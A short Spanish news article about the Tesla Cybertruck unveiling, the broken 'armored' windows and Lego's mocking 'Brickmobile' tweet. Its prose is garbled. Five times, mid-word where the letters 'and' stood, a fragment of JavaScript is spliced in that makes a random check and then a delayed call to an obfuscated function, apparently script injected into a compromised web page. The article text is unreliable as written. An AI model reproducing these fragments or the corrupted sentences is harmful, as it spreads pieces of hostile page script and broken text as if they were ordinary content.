El fundador de Tesla, Elon Musk y su Cybertruck EV.
La presentación del Cybertruck EV de Tesla y su fundador Elon Musk, es un regalo cómico que sigue dandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando de qué hablar. Los usuarios de redes sociales modificaron la camioneta eléctrica del multimillonario.
El ingenio de Lego, diseñó su propia camioneta, el Brickmobile.
La empresa de juguetes tuiteó una imagen mal iluminada de un clásico bloque de construcción de Lego sobre ruedas y dijo que es «a prueba de golpes».
Ese fue el punto: el comentario estaba dirigido directamente a la mayor vergüenza de Elon Musk por la revelación de Cybertruck cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando aseguró que la camioneta tenía «vidrios blindados». Luego hizo que uno de sus ingenieros probara las ventanas supuestamente resistentes a los golpes.
Su asistente arrojó dos grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andes bolas de acero a las ventanas del lado del conductor y, bueno, definitivamente no eran inastillables. La expresión facial de Musk cuenta la historia.
Si bien Lego no llegó a hacer ningún demo que ilustrara la dureza del Brickmobile, muchas personas se apresuraron a notar que los pequeños bloques de Lego ciertamente se sienten lo suficientemente sólidos cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando los pisas en la oscuridad.
El experto en construcción de Lego, Peter Blackert, se tomó el desafío implícito un poco más en serio y se esforzó más, construyendo dos representaciones diferentes del Cybertruck real.
Musk no ha respondido a Lego, pero sí tuiteó un video de una prueba en la que Cybertruck sacó un Ford F-150 corriendo cuesta arriba, demostrandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando que podía llevar a cabo los tipos de trabajos pesados para los que fue diseñado.